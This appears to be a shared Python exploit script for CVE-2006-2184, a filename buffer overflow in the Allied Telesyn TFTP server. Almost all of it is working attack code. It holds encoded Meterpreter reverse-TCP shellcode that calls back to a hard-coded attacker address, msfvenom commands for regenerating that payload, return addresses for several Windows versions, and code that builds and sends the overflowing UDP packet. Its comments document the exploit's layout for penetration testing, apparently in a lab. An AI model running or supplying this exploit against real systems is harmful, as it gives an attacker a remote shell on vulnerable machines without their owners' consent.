AfroThundr3007730
11/8/2017 - 9:34 PM

Modified version of the CVE-2006-2184 Python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py

#!/usr/bin/env python

import sys
import struct
import socket as so

# Startup banner, emitted as one write before any argument parsing happens.
# The trailing '\n' on the last row reproduces the blank line after the box.
print('\n'.join((
    '#######################################################################',
    '#  CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow    #',
    "#  This is a modified version of Re4son's code                        #",
    '#    (https://github.com/Re4son/AT-TFTP_Long_Filename)                #',
    '#  The return addresses are ported from metasploit module             #',
    '#    exploit/windows/tftp/attftp_long_filename                        #',
    '#######################################################################\n',
)))

# Shellcode - Staged Meterpreter Reverse TCP (NONX), x86/shikata_ga_nai encoded
# Badchars: \x00  (the payload rides inside the TFTP filename field, which is
#                  NUL-terminated -- see build_payload)
# StackAdjustment: -3500  (the 'sub esp, 0xdac' prefix below; 0xdac == 3500)
# Payload size: 210 bytes  (13 rows of 16 + 2; build_payload places the return
#                           address right after this blob, so its length is
#                           part of the overflow layout -- keep it at 210)
#
# NOTE(review): the callback target (LHOST=10.11.0.95, LPORT=443) is baked into
# this blob at generation time.  The LHOST command-line argument of this script
# does NOT change it -- to point the stager at your own listener, regenerate
# the blob with the commands below, paste the result here, and confirm the
# output is still exactly 210 bytes and contains no \x00.  As with any opaque
# shellcode copied from a third party, prefer regenerating it yourself over
# trusting it blindly.
#
# Generation instructions:
# printf '\x81\xec\xac\x0d\x00\x00' > payload   # sub esp, 0xdac (the stack adjustment)
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \
#     -a x86 --platform Windows -e generic/none -f raw >> payload
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c
#   (the raw prefix + stager still contain NULs; the second pass encodes the
#    concatenation so the final blob is NUL-free.  The leading
#    \xdb\xd6\xd9\x74\x24\xf4 looks like the encoder's usual fnstenv
#    GetPC stub.)
SHELLCODE = (
    "\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e"
    "\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27"
    "\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78"
    "\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32"
    "\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7"
    "\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d"
    "\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55"
    "\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9"
    "\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5"
    "\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a"
    "\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8"
    "\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73"
    "\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2"
    "\xf1\x82"
)


def set_return(target):
    """Return the packed 4-byte return address for numeric target id *target*.

    The addresses are ported from the Metasploit module
    exploit/windows/tftp/attftp_long_filename.  They are absolute addresses
    inside a system DLL on OS releases that predate ASLR (presumably a
    jmp/call-esp style trampoline -- the msf module does not say which), so
    each one is only valid for the exact OS / service pack / language it is
    listed under; a different build, a non-English install or a hotfixed DLL
    means a crash, not a shell.

    :param target: target id as a decimal string ('1'..'11'), as taken from argv.
    :returns: the address packed little-endian (struct format '<L').
    :raises SystemExit: for an unknown target id, after printing a message.
    """
    # id -> (description printed to the user, return address)
    targets = {
        '1':  ('Windows NT SP4 English', 0x702ea6f7),
        '2':  ('Windows 2000 SP0 English', 0x750362c3),
        '3':  ('Windows 2000 SP1 English', 0x75031d85),
        '4':  ('Windows 2000 SP2 English', 0x7503431b),
        '5':  ('Windows 2000 SP3 English', 0x74fe1c5a),
        '6':  ('Windows 2000 SP4 English', 0x75031dce),
        '7':  ('Windows XP SP0/1 English', 0x71ab7bfb),
        '8':  ('Windows XP SP2 English', 0x71ab9372),
        '9':  ('Windows XP SP3 English', 0x7e429353),      # ret by c0re
        '10': ('Windows Server 2003', 0x7c86fed3),         # ret donated by securityxxxpert
        '11': ('Windows Server 2003 SP2', 0x7c86a01b),     # ret donated by Polar Bear
    }
    try:
        description, address = targets[target]
    except KeyError:
        print('[-] Target not supported or invalid target specified!')
        sys.exit(-1)
    print('[+] Selecting target: ' + description)
    return struct.pack('<L', address)


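def build_payload(shellcode, retaddr, lhost):
    r"""Assemble the malicious TFTP write request (WRQ, opcode 2).

    Layout::

        \x00\x02 | NOP sled | shellcode | retaddr | add esp,0x28 ; ret | \x00netascii\x00

    The overlong "filename" field carries the sled, the shellcode and the
    value that overwrites the saved return address; the trailing NUL and the
    'netascii' mode keep the request well-formed so the AT TFTP server parses
    it.  Because the return address sits right after the shellcode, the sled
    length and the shellcode length together define the overflow offset.

    :param shellcode: encoded payload; must be NUL-free and the length the
        layout was tuned for (210 bytes for the bundled SHELLCODE).
    :param retaddr: 4-byte little-endian return address (see set_return).
    :param lhost: attacker address string.  It is used ONLY to size the NOP
        sled (25 - len(lhost)); it does not patch the callback address, which
        is baked into the shellcode.  NOTE(review): the sled size tracking
        len(LHOST) is ported as-is and makes the offset depend on the string
        length -- confirm against the msf module / target before relying on it.
    :returns: the raw packet as a (Python 2) byte string.
    :raises ValueError: if lhost is longer than 25 characters; the original
        silently produced an empty sled and a shifted layout in that case.
    """
    print('[+] Constructing payload.')
    sled_len = 25 - len(lhost)
    if sled_len < 0:
        raise ValueError('LHOST longer than 25 characters leaves no room for the NOP sled')
    nops = "\x90" * sled_len
    tail = "\x83\xc4\x28\xc3"           # add esp, 0x28 / ret  (tail from metasploit)
    tail += "\x00netascii\x00"          # NUL-terminate the filename, then the transfer mode
    return "\x00\x02" + nops + shellcode + retaddr + tail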


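def send_packet(payload, rhost, rport):
    """Send *payload* to (rhost, rport) as a single UDP datagram.

    TFTP runs over UDP, so there is no connection and no acknowledgement here:
    "Package delivered!" only means the datagram left this host, not that the
    server received it or that the exploit worked.

    :param payload: raw packet bytes as built by build_payload.
    :param rhost: target host name or IP address.
    :param rport: target UDP port (TFTP is normally 69).
    :raises SystemExit: after printing a message if the send fails (bad host
        name, unreachable network, ...).
    """
    s = so.socket(so.AF_INET, so.SOCK_DGRAM)
    print("[+] Delivering package...")
    try:
        s.sendto(payload, (rhost, rport))
    # socket.error, not OSError: on Python 2 socket errors derive from
    # IOError, so the original `except OSError` never caught anything and a
    # bad host name produced a traceback instead of this message.
    except so.error:
        print("[-] Could not connect to " + rhost + ":" + str(rport) + "!")
        sys.exit(-1)
    finally:
        s.close()                       # always release the descriptor
    print("[+] Package delivered!")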


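def main():
    """Parse RHOST/RPORT/LHOST[/TARGET] from argv, build the packet, send it.

    Prints the usage text and exits with status -1 when an argument is
    missing, RPORT is not an integer, or RPORT is outside 1..65535.  The
    default target id is '10' (Windows Server 2003).
    """
    try:
        RHOST = sys.argv[1]                 # Target IP address as command line argument
        RPORT = int(sys.argv[2])            # Target UDP port as command line argument
        LHOST = sys.argv[3]                 # Attacker IP address; only sizes the NOP sled (see build_payload)
        TARGET = sys.argv[4] if len(sys.argv) > 4 else '10'    # The target system
        # A port outside the UDP range would otherwise blow up inside sendto
        # with an OverflowError rather than a usage message.
        if not 0 < RPORT < 65536:
            raise ValueError('RPORT out of range')
    except (IndexError, ValueError):
        print('[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0])
        print('[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0])
        print('[-]')
        print('[-] Available Targets (* = Default):')
        print('[-]     1 - Windows NT SP4 English')
        print('[-]     2 - Windows 2000 SP0 English')
        print('[-]     3 - Windows 2000 SP1 English')
        print('[-]     4 - Windows 2000 SP2 English')
        print('[-]     5 - Windows 2000 SP3 English')
        print('[-]     6 - Windows 2000 SP4 English')
        print('[-]     7 - Windows XP SP0/1 English')
        print('[-]     8 - Windows XP SP2 English')
        print('[-]     9 - Windows XP SP3 English')
        print('[-]  * 10 - Windows Server 2003')
        print('[-]    11 - Windows Server 2003 SP2')
        sys.exit(-1)

    RETADDR = set_return(TARGET)
    PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST)
    send_packet(PAYLOAD, RHOST, RPORT)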


# Script entry point; main() exits via sys.exit(-1) on bad arguments or a
# failed send, so there is no return value to check here.
if __name__ == '__main__':
    main()